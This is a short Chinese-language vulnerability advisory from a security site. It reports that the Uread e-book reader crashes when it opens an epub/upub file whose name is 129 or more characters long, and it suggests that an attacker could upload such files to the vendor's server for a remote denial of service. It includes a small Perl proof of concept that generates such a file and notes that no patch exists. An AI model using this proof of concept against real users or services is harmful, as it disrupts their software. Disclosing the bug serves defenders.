Uread阅读器拒绝服务漏洞的分析与解决

2023-12-04 0 221

Uread阅读器在远程或本地打开文件名过长(大于或等于129个字符)的upub等文件时将引起uread.exe程序无法正常工作,必须重新启动uread.exe进程方可。 远程攻击者可考虑将过长文件名的文件上传至“至善读书”的服务器端,实现远程拒绝服务攻击。 测试证明 ———————————————————– #!/usr/bin/perl -w $filename="a"x129; print "——Generate testfile \\"a\\"x129.epub——\\n"; open(TESTFILE, ">$filename.epub"); sleep(3); close(TESTFILE); print "——Complete!——\\n"; exit(1); ———————————————————– 修复方案: 目前厂商还没有提供补丁或者升级程序。 作者 demonalex

收藏 (0) 打赏

感谢您的支持,我会继续努力的!

打开微信/支付宝扫一扫,即可进行扫码打赏哦,分享从这里开始,精彩与您同在
点赞 (0)

悠久资源 漏洞分析 Uread阅读器拒绝服务漏洞的分析与解决 https://www.u-9.cn/security/fenxi/73640.html

常见问题

相关文章

发表评论
暂无评论
官方客服团队

为您解决烦忧 - 24小时在线 专业服务